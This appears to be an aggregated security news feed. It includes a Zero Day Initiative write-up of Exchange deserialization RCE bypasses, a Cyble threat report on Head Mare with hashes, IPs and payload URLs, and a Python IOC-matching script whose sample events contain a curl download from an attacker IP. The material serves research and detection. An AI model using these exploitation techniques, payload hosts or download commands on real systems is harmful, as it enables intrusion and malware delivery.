by National Cybersecurity Alliance

The U.S. government indictment demonstrated deep knowledge of the Russian spies' activities, including their real-world meetings at a cafe in Moscow.

by TechCrunch

A secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.

by SecurityWeek

Planned Parenthood confirms "cybersecurity incident" as RansomHub ransomware gang threatens to leak 93 GB of data stolen from the nonprofit last week. The post Ransomware Gang Claims Cyberattack on Planned Parenthood appeared first on SecurityWeek.

by SecurityWeek

In my opinion, mandatory enrollment is best enrollment.

by Cisco Talos Blog

The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions. Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA),

by The Hacker News

Apache has fixed a critical security vulnerability in its open-source OFBiz (Open For Business) software, which could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers. [...]

by BleepingComputer

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-242A) published on August 29, 2024, that disseminates known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024. The post Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware appeared first on AttackIQ.

by AttackIQ

State-backed attackers and commercial surveillance vendors are repeatedly using N-day exploits to target known vulnerabilities in devices. The post Preventing Infections of N-Day Exploits Delivered via Malicious Websites appeared first on Zimperium.

by Zimperium

Businesses can amplify their digital transformation to enhance value through five key elements: business agility, transparency and validation of outcomes, ease of inclusion, augmented analysis, and AI.

by ITPro Today

Unit 29155 of Russia’s GRU military intelligence agency—a team responsible for coup attempts, assassinations, and bombings—has branched out into brazen hacking operations with targets across the world.

by WIRED Security News

Microsoft announced today that it has partnered with StopNCII to proactively remove harmful intimate images and videos from Bing using digital hashes people create from their sensitive media. [...]

by BleepingComputer

Starting October 2024, WordPress requires plugin and theme authors to enable two-factor authentication (2FA) and use SVN-specific passwords…

by Hackread

The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country.

by Cisco Talos Blog

Passwords and secrets management organisation Keeper Security has earned the distinction of Value Leader in the latest Enterprise Management Associates (EMA) 2024 Privileged Access Management (PAM) Radar™ Report for the second year in a row. The report highlights KeeperPAM – the company’s unified, end-to-end encrypted, zero-trust PAM platform – for its exceptional performance in managing […] The post Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ Report appeared first on IT Security Guru.

by IT Security Guru

The GRC Group (“GRC” or the “Group“), a leading provider of software and tech-enabled services to manage business risks and regulatory compliance, has today acquired Pentest People Ltd (“Pentest People”). The GRC Group is focused on building market-leading positions in select areas of the governance, risk and compliance market, and the acquisition of Pentest People […] The post The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and Expertise appeared first on IT Security Guru.

by IT Security Guru

You only have to take a look at the latest headlines to see that ransomware is still having a significant impact on organizations of all sizes across a wide variety of industries. The threat is evolving, though.

by Barracuda

With 20,000 internet providers across the country, the technical challenges of blocking X in Brazil mean some connections are slipping through the cracks.

by WIRED Security News

As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of four blog posts is meant to supplement the talk and provide additional technical details. For those who did not attend OffensiveCon, you can also watch the full talk here: “Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting”. This blog post covers the part from 12:05 to 18:10. In this article, part one of the series, I describe the MultiValuedProperty exploitation primitive, which became fundamental for my further exploitation of Exchange PowerShell. I also present a bypass for Microsoft’s first patch for this vulnerability, accomplished by chaining MultiValuedProperty with the Command class. Introduction You might already be familiar with the Exchange ProxyNotShell chain, CVE-2022-41040 and CVE-2022-41082. It allowed any authenticated Exchange user to achieve remote code execution. ProxyNotShell was exploited in the wild before Microsoft released a patch. I described the ProxyNotShell chain, especially its RCE vector, in this blog post. Before proceeding with this post, please make sure that you are familiar with the original issue, as this article will focus on bypassing the patches. In this blog post, I would like to start with 2 RCE vulnerabilities: • ZDI-23-163/ CVE-2023-21529 – abuse of the allowed MultiValuedProperty class.• ZDI-23-881/ CVE-2023-32031 – bypass for CVE-2023-21529, abuse of not blocked Command class. Accessing PowerShell Without ProxyShell Path Confusion The original path confusion vulnerability, CVE-2021-34473, was discovered by Orange Tsai. He used it together with CVE-2021-34523 and CVE-2021-31207 to achieve pre-auth remote code execution, forming the chain known as ProxyShell. Microsoft’s original patch for the path confusion did not eliminate the root of the problem, but instead placed it behind authentication. 
After the patch, it was exploited in the wild for post-auth remote code execution using the ProxyNotShell chain mentioned above. Exploitation of the path confusion allowed a threat actor to reach the Exchange PowerShell backend by sending HTTP requests to the autodiscover endpoint. After the patch for ProxyNotShell, it appears that this attack vector is completely blocked, though I must admit that I have never fully verified that patch. Nonetheless, a low-privileged attacker still has direct access to Exchange PowerShell Remoting, subject to Kerberos authentication. This is because every Exchange user can trigger some Exchange PowerShell cmdlets, such as Get-Mailbox. Instructions that describe direct interaction with the Exchange PowerShell can be found here. As Kerberos authentication is required, this attack surface is probably restricted to internal attackers, which is to say, attackers who are already present in the organization’s network. There remains plenty of reason for concern, though. It would not be good if any domain account (and organization member) could escalate to SYSTEM on the Exchange server. Patch for the ProxyNotShell CVE-2022-41082 RCE CVE-2022-41082, the RCE part of the ProxyNotShell chain, was fixed with the introduction of the Microsoft.Exchange.Diagnostics.UnitySerializationHolderSurrogateSelector class. It extends SurrogateSelector and its main goal is to validate the types that are retrieved during the deserialization of UnitySerializationHolder. It does this by checking the types against an allow list. Microsoft’s approach here seems appropriate. An allow list is probably the best way to fight deserialization issues and similar type-based vulnerabilities. However, when the allow list is extensive, it may be possible to find some types there that can be used in exploitation. I decided to take this path and look for potentially dangerous allowed classes. 
ZDI-23-162/ CVE-2023-21529 – Allowed MultiValuedProperty Leads to RCE The Exchange allow lists can be divided into two main parts:• List of allowed regular types.• List of allowed generic types. Generic types seem especially interesting because they allow the inclusion of arbitrary, internal types. Moreover, generic types can be also retrieved through a deserialization of UnitySerializationHolder. Let’s review the list of allowed generics that are defined in the Microsoft.Exchange.Data.SerializationTypeConverter.allowedGenerics member. The first part of the list is especially interesting because it contains custom Exchange types. It turns out that deserialization involving retrieval of the Microsoft.Exchange.Data.MultiValuedProperty<T> or Microsoft.Exchange.Data.DagNetMultiValuedProperty<T> generic classes can lead to remote code execution. One may remember that PowerShell Remoting deserialization allows one to call a single-argument constructor of any allowed type (as long as the argument can be also deserialized). This leads us to a consider a single-argument constructor of MultiValuedProperty<T>. As you can see, it accepts an argument of type object. Thus, the attacker can provide an instance of any allowed PowerShell Remoting deserializable class. This constructor invokes a different constructor that accepts a larger number of arguments. A great deal of processing occurs after the constructor call. Of primary interest is that we ultimately reach the ValueConvertor.ConvertValue method. Here, the attacker-controlled type is provided as the second argument, while the attacker-controlled object is provided as the first argument. This is the object provided to the MultiValuedProperty constructor. At [1], it invokes ValueConvertor.TryParseConversion. This call looks particularly interesting because the method name suggests that the Parse method is involved. At [2], it calls TryConstructorConversion. Let’s focus on the parse-based conversion now. 
At this stage, it is worth to note the values of specific arguments: • originalValue - value provided by the attacker to the MultiValuedProperty constructor.• originalType - type of the originalValue.• resultType - the type parameter (“T”) of the attacker-specified generic MultiValuedProperty<T> type. At [1], the method checks if originalType is the type string At [2], it calls ConvertValueFromString. This method is also called during the deserialization process. This method hardcodes several possible conversions and throws NotImplementedException if the conversion from originalType to resultType is not implemented. At [3], it catches the exception. At [4], it retrieves the public static Parse method from the attacker-controlled resultType. At [5], it invokes the Parse method with the attacker-specified value. To summarize, the MultiValuedProperty<T> generic class implements another way to call the Parse method. This can result in invocation of the XamlReader.Parse(String) method with an attacker-controlled string. In addition, TryConstructorConversion allows one to call a single-argument constructor of a given class. At this point, one can see that MultiValuedProperty<T> class implements the two most powerful conversions of PowerShell Remoting. Since it is an internal deserialization mechanism, it is included on the allow list. It can be abused by the attacker, for example to call a single-argument constructor of any accessible class. This became a fundamental building block for my subsequent vulnerability research. As an example of how MultiValuedProperty<T> can be abused, consider the following code: This line simulates what we achieve via Exchange PowerShell Remoting during exploitation: • The attacker provides a serialized UnitySerializationHolder object that specifies the allowed MultiValuedProperty<T> type. The type parameter, T, is set to System.Windows.Markup.XamlReader.• An allow list check is performed on our type: MultiValuedProperty<XamlReader>. 
The check is successful, because: (1) MultiValuedProperty<T> is present on the allow list, and (2) the type specified in the type parameter, XamlReader, is not subjected to validation at all.
• The MultiValuedProperty constructor instantiates a XamlReader object by calling the static XamlReader.Parse(String) method.
• As the attacker controls the input string, they can provide any XAML deserialization gadget to achieve remote code execution.

The simplified attack scheme is presented in the following diagram.

As we have shown, allow lists are not always secure, and they need to be carefully reviewed. It may turn out that even in a product as mature as Microsoft Exchange, allowed classes contain functionality that can be abused. This is especially true for generic classes included in the allow list: the generic (inner) type argument should always be verified by your type control mechanism. Otherwise, your allowed class may turn out to be abusable.

Moreover, class inheritance should also be verified. For example, suppose that Microsoft removed MultiValuedProperty<T> from the allow list. We would still be able to reach it via the allowed type DagNetMultiValuedProperty<T>: DagNetMultiValuedProperty<T> inherits from MultiValuedProperty<T>, and its single-argument constructor calls the constructor of the base class. Thus, it is another way to trigger the dangerous routine, and it could be abused even if MultiValuedProperty<T> were removed from the allow list.

ZDI-23-881 / CVE-2023-32031 – Bypassing the Internal Deny List with the Command Class

In CVE-2023-21529, I abused the internal deserialization-like mechanism that can be reached through the allow-listed MultiValuedProperty<T> class. When considering potential patches, two approaches present themselves:
• Remove MultiValuedProperty<T> from the allow list.
• Implement additional type control in the internal deserialization mechanism within MultiValuedProperty.

MultiValuedProperty is used frequently throughout Exchange, so removing it from the allow list is not an option. Implementing type control in the internal deserialization mechanism defined in ValueConvertor.ConvertValue looks like a good option, though. This is what the patch looks like:

You can see that the ChainedSerializationBinder.ValidateResultType method was introduced to limit the types that the attacker can specify. Consequently, if the attacker provides the type MultiValuedProperty<XamlReader>, an exception is thrown, because the type XamlReader fails the new validation.

Looking deeper into the validation mechanism, though, I found that type validation here is based on a deny list. Instead of implementing an allow list of types that can be used with MultiValuedProperty, a deny list was used. If you have seen my Hexacon talk about .NET deserialization, you probably know that I love messing with deny lists. The Exchange deny list is actually pretty good, and it contains dozens of classes. However, it contains almost no internal Exchange classes. My idea was to look for a class that:
• Is not on the deny list.
• Implements a public static Parse(String) method that leads to something exploitable, or
• Implements a public constructor that accepts a single argument and leads to something exploitable.

Such a class could be abused when chained with the MultiValuedProperty internal deserialization. The constructor-based deserialization is handled by the previously mentioned TryConstructorConversion method, and it is pretty much the same as the one implemented in PowerShell Remoting.

It didn't take me long to find the Microsoft.Diagnostics.Runtime.Utilities.Command class:

At [1], the Command(String) constructor calls the Command(String, CommandOptions) constructor. At [2], a new ProcessStartInfo is instantiated, and both the process name and the arguments are taken from attacker-controlled input. At [3], Process.StartInfo is set to the ProcessStartInfo object from line [2]. At [4], a new process is started.

This class was not included in the deny list, so the following code:

leads to the execution of cmd.exe /c calc.exe. That's it.

To sum this up, I did the following:
• I used the allow-listed MultiValuedProperty class to reach the internal deserialization mechanism. This mechanism is protected with a deny list of abusable types.
• I delivered the Command class, which is not on the deny list. This allows execution of an arbitrary command.

Demo

I presented the demo for CVE-2023-32031 during my Hexacon 2023 talk about .NET deserialization. It shows the entire exploitation process with the debugger attached.

Summary

In this blog post, I have described both CVE-2023-21529 and CVE-2023-32031. In those vulnerabilities, I abused both allow-listed and deny-listed classes to achieve RCE on Exchange. That wasn't the end of my Exchange vulnerability research, though. I still had two additional full-RCE chains that I was able to deliver after the CVE-2023-32031 patch. In the next blog post, I will provide you with full details on the ZDI-23-1419/CVE-2023-36756 RCE vulnerability. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

Criminals are impersonating MyLowesLife, Lowes' HR portal for current and former employees.

by Malwarebytes Labs

Industrials, consumer cyclicals, and healthcare sectors remain primary targets, with North America bearing the brunt of attacks.

by ITPro Today

Intermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group

by Malwarebytes Labs

A new attack runs slow and steady, focused on compromising large manufacturing companies using contextual social engineering to trick victims into giving up credentials.

by KnowBe4

Phishing remains a top initial access vector for threat actors, according to researchers at ReliaQuest. Phishing and other social engineering tactics can bypass security technologies by targeting humans directly.

by KnowBe4

It is no surprise that growing your social network can help get your name out there and provide opportunities to advance your career. LinkedIn, one of the original career-focused networking […] The post How to Put Yourself Out There – Networking on Social Media appeared first on Black Hills Information Security.

by Black Hills Information Security

by Gerald Auger of Simply Cyber // Guest Author You want to break into cybersecurity? That’s AWESOME. I’ve been in the field for 20 years and I LOVE IT! But […] The post How to Get a Job in Cybersecurity appeared first on Black Hills Information Security.

by Black Hills Information Security

Microchip Technology Inc., a leading semiconductor manufacturer, disclosed a data breach following a cyberattack that compromised its IT infrastructure. The attack, claimed by the Play ransomware group, forced the company to partially shut down operations while it worked to restore critical systems. In an SEC filing dated September 4, 2024, the company reported that the … The post Microchip Confirms Data Breach as Play Ransomware Leaks Stolen Docs appeared first on CyberInsider.

by Cyber Insider

A new survey examining public sentiment towards global IT and software providers in the aftermath of the July 2024 CrowdStrike IT outages reveals over three-quarters of people in the UK now worry about the heavy reliance of global organisations on IT systems and software providers.  The research was conducted by OnePoll, on behalf of International […] The post UK Public Worried About Global Over Reliance on IT Systems appeared first on IT Security Guru.

by IT Security Guru

It’s been a decade since the National Institute of Standards and Technology (NIST) introduced its Cybersecurity Framework (CSF) 1.0. Created following a 2013 Executive Order, NIST was tasked with designing a voluntary cybersecurity framework that would help organizations manage cyber risk, providing guidance based on established standards and best practices. While this version was originally

by The Hacker News

In today’s digital retail landscape, PCI DSS compliance is not just a regulatory requirement—it’s a critical business imperative. As a seasoned QSA and security consultant with over two and half decades of experience, I’ve witnessed firsthand the devastating impact of data breaches on businesses. Did you know that 60% of small businesses close within six...

by RH-ISAC

Key takeaways
• The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine.
• Head Mare's attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives.
• The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk.
• Head Mare's cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine's military actions.
• The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems.
• Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient.
• Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks.

Overview

The Head Mare hacktivist group has emerged as a formidable digital adversary in today's geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group's actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict.

Head Mare's focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions.

The group's operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus.

The Geopolitical Angle of Head Mare's Activities

The geopolitical implications of Head Mare's activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group's attacks are likely intended to support Ukraine's strategic objectives by applying additional pressure on Russia and Belarus.

The Russian military's struggles, especially following Ukraine's recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare's attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus.

The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus's army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus's preparations for Independence Day celebrations.

Despite the official narrative, Lukashenka's actions are likely influenced by Moscow's broader strategy. The Belarusian leader's military deployment aligns with Putin's attempt to create a strategic diversion. However, Belarus's involvement in the conflict remains complex. Lukashenka's regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka's precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely.

Technical Sophistication and Strategic Intent

Head Mare's cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection.

Persistence techniques are another hallmark of Head Mare's operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group's operational longevity but also contribute to the ongoing disruption.

Detection evasion is a critical component of Head Mare's strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems.

Command and Control Infrastructure and Credential Theft

Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle.

Credential theft is another crucial aspect of Head Mare's strategy. Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate their access and maintain control over targeted networks, amplifying their disruptive impact.

Head Mare's use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands.

Conclusion

Head Mare's cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption.

Head Mare's operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security.

Recommendations and Mitigation

To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices:
• Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation.
• Maintain encrypted backups in isolated locations to safeguard against ransomware attacks.
• Use EDR solutions to detect and respond to malicious activities in real time.
• Educate employees on recognizing and avoiding phishing attempts and other cyber threats.
• Keep systems and software up to date with the latest security patches to reduce vulnerabilities.

Indicators of Compromise (IOCs)

SHA-256 file hashes:
201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8
9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69
08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470
6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263
33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A
5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03
9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0
5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9
DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA
053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD
2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921
015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343
9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546
22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3
2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569
AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F
9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836
B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984
92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50
664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38
311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86
4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271
2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50
DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E
EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B

IP addresses (defanged):
188.127.237[.]46
45.87.246[.]169
45.87.245[.]30
185.80.91[.]107
188.127.227[.]201
5.252.176[.]47
45.11.27[.]232

URLs (defanged):
188.127.237[.]46/winlog.exe
188.127.237[.]46/servicedll.exe
194.87.210[.]134/gringo/splhost.exe
194.87.210[.]134/gringo/srvhost.exe
94.131.113[.]79/splhost.exe
94.131.113[.]79/resolver.exe
45.156.21[.]178/dlldriver.exe
5.252.176[.]77/ngrok.exe
5.252.176[.]77/sherlock.ps1
5.252.176[.]77/sysm.elf
5.252.176[.]77/servicedll.rar
5.252.176[.]77/reverse.exe
5.252.176[.]77/soft_knitting.exe
5.252.176[.]77/legislative_cousin.exe
5.252.176[.]77/2000×2000.php

Sources:
https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/
https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/
https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/
https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia

The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis appeared first on Cyble.
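Turning the IOC list and the Run-key persistence technique above into something that can be run over endpoint telemetry takes two small steps that are easy to get wrong: refanging the published indicators (`[.]` back to `.`) before comparison, and matching hashes, destination addresses, download URLs and autostart registry writes in the right fields. The following is an added example, not from the Cyble report: the event lines are constructed, the `key=value|key=value` layout with Sysmon-style field names is an assumption, and only a handful of the report's indicators are loaded (the rest plug in the same way).

```python
import re
from typing import Dict, List

# A subset of the published (defanged) indicators from the report above.
IOCS_DEFANGED = {
    "sha256": [
        "201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8",
        "9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69",
    ],
    "ip": ["188.127.237[.]46", "45.87.246[.]169"],
    "url": ["188.127.237[.]46/winlog.exe", "5.252.176[.]77/sherlock.ps1"],
}


def refang(value: str) -> str:
    """Undo common defanging so indicators compare against raw telemetry."""
    return value.replace("[.]", ".").replace("hxxp", "http").lower()


IOCS = {kind: {refang(v) for v in values} for kind, values in IOCS_DEFANGED.items()}

# Autostart location the report names as a persistence technique.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v|k=v' into a dict (constructed format; only the first '=' splits)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def check_event(line: str) -> List[str]:
    """Return findings for one event; an empty list means nothing matched."""
    e = parse_event(line)
    hits: List[str] = []
    # Process-create events carry Hashes=SHA256=...,MD5=... (Sysmon style, assumed).
    for item in e.get("Hashes", "").split(","):
        algo, _, digest = item.partition("=")
        if algo.strip().upper() == "SHA256" and digest.strip().lower() in IOCS["sha256"]:
            hits.append(f"known-bad hash {digest.strip().upper()}")
    dst = e.get("DestinationIp", "").lower()
    if dst in IOCS["ip"]:
        hits.append(f"C2/staging address {dst}")
    cmd = e.get("CommandLine", "").lower()
    for url in IOCS["url"]:
        if url in cmd:
            hits.append(f"payload URL {url} in command line")
    target = e.get("TargetObject", "")
    if e.get("EventID") == "13" and RUN_KEY.search(target):   # registry value set
        hits.append(f"Run-key persistence: {target} -> {e.get('Details', '')}")
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> findings for every line that produced at least one."""
    results: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        hits = check_event(line)
        if hits:
            results[i] = hits
    return results


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Users\\Public\\winlog.exe|Hashes=SHA256=201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8,MD5=00000000000000000000000000000000",
    "EventID=3|Image=C:\\Users\\Public\\winlog.exe|DestinationIp=188.127.237.46|DestinationPort=443",
    "EventID=13|TargetObject=HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\winlog|Details=C:\\Users\\Public\\winlog.exe",
    "EventID=1|Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl http://188.127.237.46/winlog.exe -o winlog.exe|Hashes=SHA256=0000000000000000000000000000000000000000000000000000000000000000",
    "EventID=3|Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe|DestinationIp=142.250.74.46|DestinationPort=443",
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, findings)
```

The first four sample events each produce a finding (hash, network destination, Run-key write, download URL) and the benign browser connection produces none; adapt `parse_event` to whatever your log pipeline actually emits.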

by CYBLE

According to a Salesforce study, 87% of C-suite executives say implementing AI technology is a top business priority, but 93% acknowledge barriers to adoption in their organizations.

by ZDNET Security

OpenAI’s search tool shows promise but lacks Google’s specialized functions and can suffer from hallucinations.

by ITPro Today

To fully realize the benefits trust anchors provide, organizations need to implement processes and technologies that maintain the privacy and security of trust anchors and the personal data they contain.

by Dark Reading

The United States and its allies have linked a group of Russian hackers (tracked as Cadet Blizzard and Ember Bear) behind global critical infrastructure attacks to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...]

by BleepingComputer

A critical vulnerability (CVE-2024-20017) affecting MediaTek chipsets widely used in Wi-Fi 6 (802.11ax) devices has gained heightened attention following the publication of a proof-of-concept (PoC) exploit. The flaw, which received a CVSS score of 9.8, poses a severe security risk by allowing remote code execution (RCE) without any user interaction. The PoC was released by … The post MediaTek Chip Flaw Exposing Millions of Devices Gets Public Exploit appeared first on CyberInsider.

by Cyber Insider

The Chinese-speaking threat actor Earth Lusca used the new backdoor KTLVdoor in an attack against a trading company in China. Trend Micro Researchers spotted the Chinese-speaking threat actor Earth Lusca using a new multiplatform backdoor called KTLVdoor. The Earth Lusca group has been active since at least the first half of 2023, it primarily targeted […]

by Security Affairs

Threat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos. The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed

by The Hacker News

A critical account takeover vulnerability in the LiteSpeed Cache plugin, affecting over 6 million WordPress sites, was patched yesterday with the release of version 6.5.0.1. The vulnerability allows unauthenticated users to take over logged-in accounts, including those with administrator privileges, by exploiting a debug log flaw. Security researcher Rafie Muhammad from Patchstack uncovered the issue … The post LiteSpeed Cache Flaw Exposes 6 Million WordPress Sites to Admin Takeover appeared first on CyberInsider.

by Cyber Insider

Boston, MA, 5th September 2024, CyberNewsWire

by Hackread

The gender gap in cybersecurity isn’t a new issue. The lack of women in cybersecurity and IT has been making headlines for years — even decades. While progress has been made, there is still significant work to do, especially regarding salary. The recent  ISC2 Cybersecurity Workforce Study highlighted numerous cybersecurity issues regarding women in the […] The post New report shows ongoing gender pay gap in cybersecurity appeared first on Security Intelligence.

by Security Intelligence

Yet, another critical severity vulnerability has been discovered in LiteSpeed Cache, a caching plugin for speeding up user browsing in over 6 million WordPress sites. [...]

by BleepingComputer

Episode 362 looks at X’s recent ban, voice-over theft and Apple’s big App store conundrum.

by Kaspersky

After a decline in interest, serverless computing is resurging, positioning it as a key technology for modern cloud-native development.

by ITPro Today

North Carolina musician Michael Smith was indicted for collecting over $10 million in royalty payments from Spotify, Amazon Music, Apple Music, and YouTube Music using AI-generated songs streamed by thousands of bots in a massive streaming fraud scheme. [...]

by BleepingComputer

As AI and ML revolutionize healthcare, concerns over data privacy and HIPAA compliance underscore the need for stringent security measures and ethical data handling practices.

by ITPro Today

OnlyFans account hackers are finding themselves on the receiving end of a nasty cyber surprise.

by Hackread

Microclouds combine cloud convenience with edge infrastructure, offering preconfigured server clusters for easy deployment anywhere, but their future impact on cloud computing remains uncertain.

by ITPro Today

